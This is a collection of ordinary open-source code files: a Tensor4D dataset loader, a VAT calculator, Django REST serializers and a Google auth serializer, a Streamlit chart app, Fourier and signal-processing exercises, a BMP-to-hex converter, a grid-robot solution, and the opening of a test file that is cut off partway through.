[n_images, 4, 4]\n self.focal = self.intrinsics_all[0][0, 0]\n self.pose_all = 
torch.stack(self.pose_all).to(self.device) # [n_images, 4, 4]\n self.proj_all = torch.stack(self.proj_all).to(self.device)\n self.H, self.W = self.images.shape[1], self.images.shape[2]\n self.image_pixels = self.H * self.W\n self.fid_all = torch.stack(self.fid_list).to(self.device)\n self.time_emb_list = (self.fid_all / self.n_frames * 2) - 0.95\n\n object_bbox_min = np.array([-1.01, -1.01, -1.01, 1.0])\n object_bbox_max = np.array([ 1.01, 1.01, 1.01, 1.0])\n # Object scale mat: region of interest to **extract mesh**\n object_scale_mat = np.load(os.path.join(self.data_dir, self.object_cameras_name))['scale_mat_0']\n object_bbox_min = np.linalg.inv(self.scale_mats_np[0]) @ object_scale_mat @ object_bbox_min[:, None]\n object_bbox_max = np.linalg.inv(self.scale_mats_np[0]) @ object_scale_mat @ object_bbox_max[:, None]\n self.object_bbox_min = object_bbox_min[:3, 0]\n self.object_bbox_max = object_bbox_max[:3, 0]\n self.process_radius()\n\n print('Load data: End')\n\n def process_radius(self):\n for img_idx in tqdm(range(self.images.shape[0])):\n tx = torch.linspace(0, self.W - 1, self.W, device=self.device)\n ty = torch.linspace(0, self.H - 1, self.H, device=self.device)\n pixels_x, pixels_y = torch.meshgrid(tx, ty)\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3\n rays_v = torch.matmul(self.intrinsics_all_inv[img_idx, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3\n rays_v = torch.matmul(self.pose_all[img_idx, None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3\n dx = torch.sqrt(torch.sum((rays_v[:-1, :, :] - rays_v[1:, :, :]) ** 2, dim=-1))\n dx = torch.cat([dx, dx[-2:-1, :]], dim=0)\n # Cut the distance in half, and then round it out so that it's\n # halfway between inscribed by / circumscribed about the pixel.\n radii = dx[..., None] * 2 / np.sqrt(12)\n self.radius[img_idx] = radii.detach().cpu() # W H 3\n\n def gen_rays_at(self, img_idx, resolution_level=1):\n \"\"\"\n Generate rays at world space from one camera.\n \"\"\"\n l = resolution_level\n tx = torch.linspace(0, self.W - 1, self.W // l, device=self.device)\n ty = torch.linspace(0, self.H - 1, self.H // l, device=self.device)\n pixels_x, pixels_y = torch.meshgrid(tx, ty)\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3\n rays_v = torch.matmul(self.intrinsics_all_inv[img_idx, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3\n rays_v = torch.matmul(self.pose_all[img_idx, None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3\n dx = torch.sqrt(torch.sum((rays_v[:-1, :, :] - rays_v[1:, :, :]) ** 2, dim=-1))\n dx = torch.cat([dx, dx[-2:-1, :]], dim=0)\n rays_r = dx[..., None] * 2 / np.sqrt(12)\n rays_o = self.pose_all[img_idx, None, None, :3, 3].expand(rays_v.shape) # W, H, 3\n rays_v = rays_v / torch.linalg.norm(rays_v, ord=2, dim=-1, keepdim=True) # W, H, 3\n return rays_o.transpose(0, 1), rays_v.transpose(0, 1), rays_r.transpose(0, 1)\n\n def gen_random_rays_at(self, img_idx, batch_size):\n \"\"\"\n Generate random rays at world space from one camera.\n \"\"\"\n error = self.errors[img_idx].reshape(-1).numpy()\n max_error = np.max(error) + 1e-8\n error = error / max_error\n error[error < 0.1] = 0.1\n error = error / np.sum(error)\n index = np.arange(0, self.W*self.H // 64)\n select_index = np.random.choice(index, size=[batch_size], p=error)\n pixels_y = torch.LongTensor(select_index // (self.W // 8)) * 8\n pixels_y += torch.randint_like(pixels_y, 8)\n pixels_x = torch.LongTensor(select_index % (self.W // 8)) * 8\n 
pixels_x += torch.randint_like(pixels_x, 8)\n\n color = self.images[img_idx][(pixels_y, pixels_x)] # batch_size, 3\n mask = self.masks[img_idx][(pixels_y, pixels_x)] # batch_size, 3\n rays_r = self.radius[img_idx][(pixels_x, pixels_y)] # batch_size, 1\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1).float().to(self.device) # batch_size, 3\n p = torch.matmul(self.intrinsics_all_inv[img_idx, None, :3, :3], p[:, :, None]).squeeze() # batch_size, 3\n rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # batch_size, 3\n rays_v = torch.matmul(self.pose_all[img_idx, None, :3, :3], rays_v[:, :, None]).squeeze() # batch_size, 3\n rays_o = self.pose_all[img_idx, None, :3, 3].expand(rays_v.shape) # batch_size, 3\n return torch.cat([rays_o.cpu(), rays_v.cpu(), color.cpu(), mask[:, :1].cpu(), rays_r.cpu()], dim=-1).cuda(), pixels_y.cpu(), pixels_x.cpu() # batch_size, 10\n\n def gen_rays_between(self, idx_0, idx_1, ratio, resolution_level=1):\n \"\"\"\n Interpolate pose between two cameras.\n \"\"\"\n l = resolution_level\n tx = torch.linspace(0, self.W - 1, self.W // l, device=self.device)\n ty = torch.linspace(0, self.H - 1, self.H // l, device=self.device)\n pixels_x, pixels_y = torch.meshgrid(tx, ty)\n p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3\n rays_v = torch.matmul(self.intrinsics_all_inv[0, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3\n trans = self.pose_all[idx_0, :3, 3] * (1.0 - ratio) + self.pose_all[idx_1, :3, 3] * ratio\n pose_0 = self.pose_all[idx_0].detach().cpu().numpy()\n pose_1 = self.pose_all[idx_1].detach().cpu().numpy()\n pose_0 = np.linalg.inv(pose_0)\n pose_1 = np.linalg.inv(pose_1)\n rot_0 = pose_0[:3, :3]\n rot_1 = pose_1[:3, :3]\n rots = Rot.from_matrix(np.stack([rot_0, rot_1]))\n key_times = [0, 1]\n slerp = Slerp(key_times, rots)\n rot = slerp(ratio)\n pose = np.diag([1.0, 1.0, 1.0, 1.0])\n pose = pose.astype(np.float32)\n pose[:3, :3] = rot.as_matrix()\n pose[:3, 3] = ((1.0 - ratio) * pose_0 + ratio * pose_1)[:3, 3]\n pose = np.linalg.inv(pose)\n rot = torch.from_numpy(pose[:3, :3]).cuda()\n trans = torch.from_numpy(pose[:3, 3]).cuda()\n rays_v = torch.matmul(rot[None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3\n dx = torch.sqrt(torch.sum((rays_v[:-1, :, :] - rays_v[1:, :, :]) ** 2, dim=-1))\n dx = torch.cat([dx, dx[-2:-1, :]], dim=0)\n rays_r = dx[..., None] * 2 / np.sqrt(12)\n rays_v = rays_v / torch.linalg.norm(rays_v, ord=2, dim=-1, keepdim=True) # W, H, 3\n rays_o = trans[None, None, :3].expand(rays_v.shape) # W, H, 3\n return rays_o.transpose(0, 1), rays_v.transpose(0, 1), rays_r.transpose(0, 1)\n\n def near_far_from_sphere(self, rays_o, rays_d):\n if self.near > 0:\n return self.near, self.far\n a = torch.sum(rays_d**2, dim=-1, keepdim=True)\n b = 2.0 * torch.sum(rays_o * rays_d, dim=-1, keepdim=True)\n mid = 0.5 * (-b) / a\n near = mid - 1.0\n far = mid + 1.0\n return near, far\n\n def image_at(self, idx, resolution_level):\n img = cv.imread(self.images_lis[idx])\n return (cv.resize(img, (self.W // resolution_level, self.H // resolution_level))).clip(0, 255)\n\n","repo_name":"DSaurus/Tensor4D","sub_path":"models/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"2716118804","text":"def calculoIva(valor):\r\n iva = round(valor * 19 / 100) #línea ? 1\r\n return iva\r\n\r\ndef bruto(valor):\r\n iva = calculoIva(valor) #línea ? 
2\r\n bruto = valor + iva\r\n return bruto\r\n\r\ndef descuento(neto, porcentaje):\r\n total = neto - round(neto * porcentaje / 100) #línea ? 3\r\n return total\r\n\r\nprint()\r\nneto = int(input(\"Ingrese el total de la compra: \"))\r\nporcentajeDescuento = int(input(\"Ingrese el total del descuento: \"))\r\nprint()\r\nprint(f\"Total neto: {neto}\")\r\nconDescuento = descuento(neto, porcentajeDescuento)\r\nprint(f\"Total con descuento: {conDescuento}\")\r\nprint(f\"Impuesto: {calculoIva(conDescuento)}\")\r\nprint(f\"Total bruto: {bruto(conDescuento)}\")\r\nprint()","repo_name":"hersairaf/imprep","sub_path":"3.3 2 CalculoIva.py","file_name":"3.3 2 CalculoIva.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18536135231","text":"from rest_framework import serializers\nfrom utils.serializers import resource_read_only\n\nfrom ..models import Problem\n\nfrom ..models import Limit\nfrom ..models import TestData, ProblemTestData\n\n\nclass ProblemListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Problem\n fields = '__all__'\n read_only_fields = resource_read_only + ('meta_problem',\n 'number_test_data',\n 'number_virtual_judge',\n 'number_decorator',\n 'number_limit',\n 'number_category',\n 'number_node')\n\n def create(self, validated_data):\n description = validated_data['description']\n sample = validated_data['sample']\n meta_problem = validated_data['meta_problem']\n if description is not None and description.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose description from other meta problem.')\n if sample is not None and sample.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose sample from other meta problem.')\n return super().create(validated_data)\n\n\nclass ProblemDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Problem\n fields = '__all__'\n read_only_fields = resource_read_only + ('meta_problem',\n 'number_test_data',\n 'number_virtual_judge',\n 'number_decorator',\n 'number_limit',\n 'number_category',\n 'number_node')\n\n def update(self, instance, validated_data):\n description = validated_data['description']\n sample = validated_data['sample']\n meta_problem = instance.meta_problem\n if description is not None and description.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose description from other meta problem.')\n if sample is not None and sample.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose sample from other meta problem.')\n return super().update(instance, validated_data)\n\n\nclass ProblemReadOnlySerializer(serializers.ModelSerializer):\n class Meta:\n model = Problem\n exclude = ('meta_problem',)\n\n\nclass LimitListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Limit\n fields = '__all__'\n read_only_fields = resource_read_only + ('problem',)\n\n\nclass LimitDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Limit\n fields = '__all__'\n read_only_fields = resource_read_only + ('problem',)\n\n\nclass TestDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = TestData\n fields = '__all__'\n\n\nclass TestDataRelationSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProblemTestData\n fields = '__all__'\n read_only_fields = resource_read_only + ('problem',)\n\n def create(self, validated_data):\n test_data = validated_data['test_data']\n 
problem = validated_data['problem']\n meta_problem = problem.meta_problem\n print(test_data.meta_problem, meta_problem)\n if test_data is not None and test_data.meta_problem != meta_problem:\n raise serializers.ValidationError('Cannot choose test data from other meta problem.')\n if ProblemTestData.objects.filter(problem=problem, test_data=test_data).exists():\n raise serializers.ValidationError('Relation already exists.')\n return super().create(validated_data)\n","repo_name":"GuoDuanLZ/sdustoj-judge-webserver","sub_path":"sdustoj_server/problem/api_server/problem_serializers.py","file_name":"problem_serializers.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17206920214","text":"from django.conf import settings\nfrom rest_framework import serializers\nfrom library.sociallib import google\nfrom library.register.register import register_social_user\nfrom rest_framework.exceptions import AuthenticationFailed\n\nclass GoogleSocialAuthSerializer(serializers.Serializer):\n auth_token = serializers.CharField()\n\n def validate_auth_token(self, auth_token):\n user_data = google.Google.validate(auth_token)\n try:\n user_data['sub']\n except:\n raise serializers.ValidationError(\n 'The token is invalid or expired. Please login again.'\n )\n # print(user_data['aud'])\n if user_data['aud'] != settings.GOOGLE_CLIENT_ID:\n\n raise AuthenticationFailed('oops, who are you?')\n\n email = user_data['email']\n name = user_data['name']\n provider = 'google'\n\n return register_social_user(\n provider=provider, email=email, name=name)","repo_name":"ianfshirley/JobHuntHQ-API","sub_path":"accounts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42816172132","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\nst.title(\"In Search for Happiness\")\ndf = pd.read_csv(\"happy.csv\")\n\nx_axis = st.selectbox(\"Select the data for X axis\", options=df.columns)\ny_axis = st.selectbox(\"Select the data for Y axis\", options=df.columns)\n\n\nst.header(f\"{x_axis} and {y_axis}\")\n\nfigure = px.scatter(data_frame=df, x=x_axis, y=y_axis)\nst.plotly_chart(figure)\n","repo_name":"Chandrakanth0698/codingexerices","sub_path":"happyness_app.py","file_name":"happyness_app.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9812223070","text":"import numpy as np\nimport scipy.io.wavfile as wv\nfrom scipy import signal\nfrom scipy.ndimage.interpolation import map_coordinates\nimport imageio\nfrom skimage.color import rgb2gray\n# import matplotlib.pyplot as plt\n# import pandas as pd\n\n\n\n\ndef init_DFT_natrix(N):\n \"\"\" initiate DFT matrix of size N x N\"\"\"\n u = x = np.arange(N)\n # u = x = np.arange(-np.floor(N / 2), np.ceil(N / 2))\n ux = np.outer(x, u)\n i = np.complex(0, 1)\n DFT_mat = np.cos((2 * np.pi * ux) / N) - i * np.sin((2 * np.pi * ux) / N)\n return DFT_mat\n\n\ndef init_IDFT_natrix(N):\n \"\"\" initiate DFT matrix of size N x N\"\"\"\n u = x = np.arange(N)\n # u = x = np.arange(-np.floor(N / 2), np.ceil(N / 2))\n ux = np.outer(x, u)\n i = np.complex(0, 1)\n IDFT_mat = np.cos((2 * np.pi * ux) / N) + i * np.sin((2 * np.pi * ux) / N)\n return IDFT_mat / N\n\n\ndef DFT(signal):\n \"\"\" this function transforms a 1D discrete 
signal to its 1D Fourier representation \"\"\"\n DFT_mat = init_DFT_natrix(signal.shape[0])\n return np.dot(DFT_mat, signal)\n\n\ndef IDFT(fourier_signal):\n \"\"\" this function transforms a 1D Fourier representation to its 1D discrete signal \"\"\"\n IDFT_mat = init_IDFT_natrix(fourier_signal.shape[0])\n return np.dot(IDFT_mat, fourier_signal)\n\n\ndef DFT2(image):\n \"\"\" this function transforms a 2D discrete signal to its 2D Fourier representation \"\"\"\n extra_dim = len(image.shape) == 3\n DFT_mat_1 = init_DFT_natrix(image.shape[0])\n DFT_mat_2 = init_DFT_natrix(image.shape[1])\n if extra_dim:\n image = image[:, :, 0]\n first_DFT = np.dot(DFT_mat_1, image)\n second_DFT = np.dot(DFT_mat_2, first_DFT.transpose())\n result = second_DFT.transpose()\n if extra_dim:\n result = result[..., np.newaxis]\n return result\n\n\ndef IDFT2(fourier_image):\n \"\"\" this function transforms a 2D Fourier representation to its 2D discrete signal \"\"\"\n extra_dim = len(fourier_image.shape) == 3\n DFT_mat_1 = init_IDFT_natrix(fourier_image.shape[0])\n DFT_mat_2 = init_IDFT_natrix(fourier_image.shape[1])\n if extra_dim:\n fourier_image = fourier_image[:, :, 0]\n first_DFT = np.dot(DFT_mat_1, fourier_image)\n second_DFT = np.dot(DFT_mat_2, first_DFT.transpose())\n result = second_DFT.transpose()\n if extra_dim:\n result = result[..., np.newaxis]\n return result\n\n\ndef change_rate(filename, ratio):\n \"\"\" this function creates new wav file with duration time of original_duration/ratio \"\"\"\n orig_wav = wv.read(filename)\n wv.write(\"change_rate.wav\", int(orig_wav[0] * ratio), orig_wav[1])\n\n\ndef change_samples(filename, ratio):\n \"\"\" this function creates new wav file with same rate but different samples \"\"\"\n rate, samples = wv.read(filename)\n new_samples = resize(samples, ratio).real\n wv.write(\"change_samples.wav\", rate, new_samples)\n return new_samples\n\n\ndef resize(data, ratio):\n \"\"\" this function returns resized data by ratio\"\"\"\n fourier = DFT(data)\n shifted_f = np.fft.fftshift(fourier)\n # shifted_f = fourier\n if ratio > 1:\n resized = clip_high_freq(shifted_f, ratio)\n elif ratio < 1:\n resized = pad_with_zeros(shifted_f, ratio)\n else:\n return data.astype('float64')\n shifted_back = np.fft.ifftshift(resized)\n # shifted_back = resized\n return IDFT(shifted_back)\n\n\ndef clip_high_freq(data, ratio):\n \"\"\" this function clips high frequencies from data according to ratio \"\"\"\n N = data.shape[0]\n new_N = int(N / ratio)\n diff = N - new_N\n left = int(np.ceil(diff / 2))\n right = N - int(np.floor(diff / 2))\n return data[left: right]\n\ndef pad_with_zeros(data, ratio):\n \"\"\" this function pads data with zeros according to ratio \"\"\"\n N = data.shape[0]\n new_N = int(N/ratio)\n diff = new_N - N\n left = int(np.floor(diff/2))\n right = int(np.ceil(diff/2))\n return np.concatenate([np.zeros(left), data, np.zeros(right)])\n\n\ndef resize_spectrogram(data, ratio):\n \"\"\"this function resizes data spectogram\"\"\"\n spectrogram = stft(data)\n new_spectrogram = np.apply_along_axis(resize, 1, spectrogram, ratio)\n return istft(new_spectrogram)\n\n\ndef resize_vocoder(data, ratio):\n spectrogram = stft(data)\n return istft(phase_vocoder(spectrogram, ratio))\n\n\ndef conv_der(im):\n x_der_conv = np.array([[0.5, 0, -0.5]])\n y_der_conv = x_der_conv.transpose()\n im_x_derived = signal.convolve2d(im, x_der_conv, mode='same')\n im_y_derived = signal.convolve2d(im, y_der_conv, mode='same')\n magnitude = np.sqrt(np.abs(im_x_derived) ** 2 + np.abs(im_y_derived) ** 2)\n 
return magnitude\n\n\ndef fourier_der(im):\n im_x_derived = fourier_der_by_axis(im, 0)\n im_y_derived = fourier_der_by_axis(im, 1)\n magnitude = np.sqrt(np.abs(im_x_derived) ** 2 + np.abs(im_y_derived) ** 2)\n return magnitude\n\n\ndef fourier_der_by_axis(im, axis):\n fourier = DFT2(im)\n shifted_fourier = np.fft.fftshift(fourier)\n # shifted_fourier = fourier\n if axis == 0:\n multiplied = multiply_rows(shifted_fourier)\n multiplied *= (2 * np.pi)/im.shape[0]\n else:\n multiplied = multiply_columns(shifted_fourier)\n multiplied *= (2 * np.pi) / im.shape[1]\n shifted_back = np.fft.ifftshift(multiplied)\n # shifted_back = multiplied\n return IDFT2(shifted_back)\n\n\ndef multiply_rows(mat):\n N = mat.shape[0]\n vec = np.arange(-np.floor(N/2), np.ceil(N/2)).transpose()\n vec = vec[..., np.newaxis]\n return mat * vec\n\n\ndef multiply_columns(mat):\n N = mat.shape[1]\n vec = np.arange(-np.floor(N/2), np.ceil(N/2)).transpose()\n vec = vec[..., np.newaxis]\n return (mat.transpose() * vec).transpose()\n\n\ndef stft(y, win_length=640, hop_length=160):\n fft_window = signal.windows.hann(win_length, False)\n\n # Window the time series.\n n_frames = 1 + (len(y) - win_length) // hop_length\n frames = [y[s:s + win_length] for s in np.arange(n_frames) * hop_length]\n\n stft_matrix = np.fft.fft(fft_window * frames, axis=1)\n return stft_matrix.T\n\n\ndef istft(stft_matrix, win_length=640, hop_length=160):\n n_frames = stft_matrix.shape[1]\n y_rec = np.zeros(win_length + hop_length * (n_frames - 1), dtype=np.float)\n ifft_window_sum = np.zeros_like(y_rec)\n\n ifft_window = signal.windows.hann(win_length, False)[:, np.newaxis]\n win_sq = ifft_window.squeeze() ** 2\n\n # invert the block and apply the window function\n ytmp = ifft_window * np.fft.ifft(stft_matrix, axis=0).real\n\n for frame in range(n_frames):\n frame_start = frame * hop_length\n frame_end = frame_start + win_length\n y_rec[frame_start: frame_end] += ytmp[:, frame]\n ifft_window_sum[frame_start: frame_end] += win_sq\n\n # Normalize by sum of squared window\n y_rec[ifft_window_sum > 0] /= ifft_window_sum[ifft_window_sum > 0]\n return y_rec\n\n\ndef phase_vocoder(spec, ratio):\n time_steps = np.arange(spec.shape[1]) * ratio\n time_steps = time_steps[time_steps < spec.shape[1]]\n\n # interpolate magnitude\n yy = np.meshgrid(np.arange(time_steps.size), np.arange(spec.shape[0]))[1]\n xx = np.zeros_like(yy)\n coordiantes = [yy, time_steps + xx]\n warped_spec = map_coordinates(np.abs(spec), coordiantes, mode='reflect', order=1).astype(np.complex)\n\n # phase vocoder\n # Phase accumulator; initialize to the first sample\n spec_angle = np.pad(np.angle(spec), [(0, 0), (0, 1)], mode='constant')\n phase_acc = spec_angle[:, 0]\n\n for (t, step) in enumerate(np.floor(time_steps).astype(np.int)):\n # Store to output array\n warped_spec[:, t] *= np.exp(1j * phase_acc)\n\n # Compute phase advance\n dphase = (spec_angle[:, step + 1] - spec_angle[:, step])\n\n # Wrap to -pi:pi range\n dphase = np.mod(dphase - np.pi, 2 * np.pi) - np.pi\n\n # Accumulate phase\n phase_acc += dphase\n\n return warped_spec\n\n\ndef read_image(filename, representation):\n \"\"\"\n this function reads an image file and converts it into a given representation\n :param filename: image to process\n :param representation: 1 for gray scale, 2 for rgb\n :return: image from filename represented in the given representation\n \"\"\"\n img = imageio.imread(filename)\n if np.amax(img) > 1:\n img = img / (256 - 1) # normalized if needed\n dim = len(img.shape)\n if representation == 1 and dim == 
3:\n return rgb2gray(img)\n else:\n return img\n\n\ndef pad_filter_with_zeros(filter, shape):\n \"\"\" this function pads a filter to the size of shape - for my tests\"\"\"\n zeros = np.zeros((shape[0], shape[1]))\n x = int((shape[0]-filter.shape[0])/2)\n y = int((shape[1]-filter.shape[1])/2)\n zeros[x :x + filter.shape[0],y :y+filter.shape[1]] = filter\n return zeros\n\n\ndef create_big_filter(little_filter, size):\n \"\"\" this function returns filter that is like little_filter only 'size' times bigger - for my tests\"\"\"\n new_filter = np.zeros((little_filter.shape[0] * size, little_filter.shape[1] * size))\n for i in range(little_filter.shape[0]):\n for j in range(little_filter.shape[1]):\n cube = np.ones((size, size)) * little_filter[i][j]\n new_filter[i*size:(i+1)*size, j*size:(j+1)*size] = cube\n return new_filter\n\n# MY TESTS\n# if __name__ == '__main__':\n# # show image\n# filename = '/Users/ellaby/Documents/year D/image_processing/exes/ex2-ellaby/external/city.jpg'\n# im = read_image(filename, 1)\n# plt.imshow(im, cmap=plt.cm.gray)\n# plt.show()\n#\n# # fourier image\n# fourier = DFT2(im)\n# plt.imshow(fourier.real, cmap=plt.cm.gray)\n# plt.show()\n#\n# # double fourier image\n# fourier2 = DFT2(fourier)\n# plt.imshow(fourier2.real, cmap=plt.cm.gray)\n# plt.show()\n#\n# # possible filters\n# filt_ones = np.ones((1, 1))\n# filt_der_x = np.array([[-1, 0, 1]])\n# filt_der_y = np.array([[-1], [0], [1]])\n# filt_sum_der_x_der_y = filt_der_x + filt_der_y\n#\n# # convolution with filter\n# filt = create_big_filter(filt_ones, 20)\n# convolved = signal.convolve2d(im, filt, boundary='symm', mode='same')\n# plt.imshow(convolved, cmap=plt.cm.gray)\n# plt.show()\n#\n# # show filter padded with seros\n# padded_filt = pad_filter_with_zeros(filt, im.shape)\n# plt.imshow(padded_filt, cmap=plt.cm.gray)\n# plt.show()\n#\n# # DFT to filter\n# F_filt = DFT2(padded_filt.real)\n# plt.imshow(np.abs(F_filt), cmap=plt.cm.gray)\n# plt.show()\n#\n# F_im = DFT2(im)\n# mult = F_filt * F_im\n# new_im = IDFT2(mult)\n# # need do shift.....\n# new_im = np.fft.fftshift(new_im)\n# plt.imshow(new_im.real, cmap=plt.cm.gray)\n# plt.show()\n\n","repo_name":"EllaBarYaacov/Image-processing","sub_path":"ex2-ellaby/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":10584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4452451996","text":"import array\nimport math\nimport os\nimport sys\nfrom PIL import Image\nimport cv2\nimport ast\n\nresult_h2x = []\n\n\nclass DEFAULTS(object):\n STRUCTURE_NAME = 'GFXMeta'\n VERSION = '2.3'\n\n\ndef getLONG(a, n):\n return (a[n + 3] * (2 ** 24)) + (a[n + 2] * (2 ** 16)) + (a[n + 1] * (2 ** 8)) + (a[n])\n\n\n# Utility function. 
Return an int from array (little endian)\ndef getINT(a, n):\n    return (a[n + 1] * (2 ** 8)) + (a[n])\n\n\n# Reverses pixels in byte\ndef reflect(a):\n    r = 0\n    for i in range(8):\n        r <<= 1\n        r |= (a & 0x01)\n        a >>= 1\n    return r\n\n\n# Main conversion function\ndef bmp2hex(infile, tablewidth, sizebytes, invert, raw, named, double, xbm):\n    # Set the table name to the uppercase root of the file name\n    tablename = os.path.splitext(infile)[0].upper()\n\n    # Convert tablewidth to characters from hex bytes\n    tablewidth = int(tablewidth) * 6\n\n    # Initialize output buffer\n    outstring = ''\n\n    # Open File\n    fin = open(os.path.expanduser(infile), \"rb\")\n    uint8_tstoread = os.path.getsize(os.path.expanduser(infile))\n    valuesfromfile = array.array('B')\n    try:\n        valuesfromfile.fromfile(fin, uint8_tstoread)\n    finally:\n        fin.close()\n\n    # Get bytes from file\n    values = valuesfromfile.tolist()\n\n    # Exit if it's not a Windows BMP\n    if (values[0] != 0x42) or (values[1] != 0x4D):\n        sys.exit(\"Error: Unsupported BMP format. Make sure your file is a Windows BMP.\")\n\n    # Calculate width, height\n    dataOffset = getLONG(values, 10) # Offset to image data\n    pixelWidth = getLONG(values, 18) # Width of image\n    pixelHeight = getLONG(values, 22) # Height of image\n    bitDepth = getINT(values, 28) # Bits per pixel\n    dataSize = getLONG(values, 34) # Size of raw data\n\n    # Calculate line width in bytes and padded byte width (each row is padded to 4-byte multiples)\n    byteWidth = int(math.ceil(float(pixelWidth * bitDepth) / 8.0))\n    paddedWidth = int(math.ceil(float(byteWidth) / 4.0) * 4.0)\n\n    # For auto (sizebytes = 0), set sizebytes to 1 or 2, depending on size of the bitmap\n    if sizebytes == 0:\n        if (pixelWidth > 255) or (pixelHeight > 255):\n            sizebytes = 2\n        else:\n            sizebytes = 1\n\n    # The invert byte is set based on the invert command line flag (but, the logic is reversed for 1-bit files)\n    invertbyte = 0xFF if invert else 0x00\n    if bitDepth == 1:\n        invertbyte = invertbyte ^ 0xFF\n    try:\n        for i in range(pixelHeight):\n            for j in range(byteWidth):\n                ndx = dataOffset + ((pixelHeight - 1 - i) * paddedWidth) + j\n                v = values[ndx] ^ invertbyte\n                if xbm:\n                    v = reflect(v)\n                # print (\"{0:#04x}\".format(v))\n                outstring += \"{0:#04x}\".format(v) + \", \"\n                result_h2x.append(v)\n    finally:\n        return result_h2x\n\n\n# ---------------------------------------------------------------------------------------------------\n\n# convert to grayscale\ndef conv2(imagePath, savePath):\n    im = Image.open(imagePath)\n    im.convert(mode=\"L\").save(savePath)\n\n\n# convert to a 1-bit image\ndef conv3(imagePath, savePath):\n    im = Image.open(imagePath)\n    im.convert(mode=\"1\").save(savePath)\n\n\n# binarize with an adaptive threshold\ndef conv4(imagePath, savePath):\n    img = cv2.imread(imagePath, 0)\n    # blur = cv2.GaussianBlur(img, (5, 5), 0)\n    thresh = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 25, 10)\n    cv2.imwrite(savePath, thresh)\n\n\n# encode an image into hex codes\ndef createCode(imgPath):\n    ra = bmp2hex(imgPath, \"0\", \"0\", False, False, False, False, True)\n    return ra\n\n\n# convert a frame's hex-code file into a list\ndef fileH2xToList(filePath):\n    data = open(filePath, 'r')\n    res = data.read()\n    data.close()\n    r2es = res.strip('[')\n    r3es = r2es.strip(']')\n    arr = r3es.split(',')\n    a2rr = list(map(int, arr))\n    return a2rr\n\n\n# convert an fc file into a dict\ndef flTodic(flPath):\n    data = open(flPath, 'r')\n    res = data.read()\n    data.close()\n    result_dic = ast.literal_eval(res)\n    return result_dic\n\n\n# convert an fc frame string into a list\ndef flH2xToList(flvalue):\n    r2es = flvalue.strip('[')\n    r3es = r2es.strip(']')\n    arr = r3es.split(',')\n    a2rr = list(map(int, arr))\n    
return a2rr\n","repo_name":"icomgx/esp32_p2layer","sub_path":"conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2100948021","text":"N,M = map(int,input().split())\n\n# robot position (row, column) and facing direction: 0=north, 1=east, 2=south, 3=west\nr, c, d = map(int,input().split())\n\nfield = [[int(x) for x in input().split()] for _ in range(N)]\nvisited = [[0]*M for _ in range(N)]\n\n# movement deltas indexed by direction\ndr = [-1, 0, 1, 0]\ndc = [0, 1, 0, -1]\n\nvisited[r][c] = 1\nresult = 1\n\nwhile True:\n    moved = False\n    for _ in range(4):\n        d = (d + 3) % 4  # turn left\n        nr, nc = r + dr[d], c + dc[d]\n        if field[nr][nc] == 0 and visited[nr][nc] == 0:\n            visited[nr][nc] = 1\n            result += 1\n            r, c = nr, nc\n            moved = True\n            break\n    if not moved:\n        # all four directions blocked: back up without turning, stop at a wall\n        br, bc = r - dr[d], c - dc[d]\n        if field[br][bc] == 1:\n            break\n        r, c = br, bc\n\nprint(result)\n","repo_name":"YuHyeonGeun-KOR/My-Algorithm-Journey","sub_path":"This is cote/Chapter 4.Implementation/gamedevelop.py","file_name":"gamedevelop.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12933847143","text":"\"\"\"Most simple integration testing.\"\"\"\nimport unittest\nimport uuid\nimport tempfile\nimport shutil\nimport os\nimport mock\n\nfrom ctshed import get_tool_options, install\n\n\ndef random_namespace():\n    return uuid.uuid4().hex[:7]\n\n\nclass TestBasic(unittest.TestCase):\n    def setUp(self):\n        self.tmp_dir = tempfile.mkdtemp()\n\n    def tearDown(self):\n        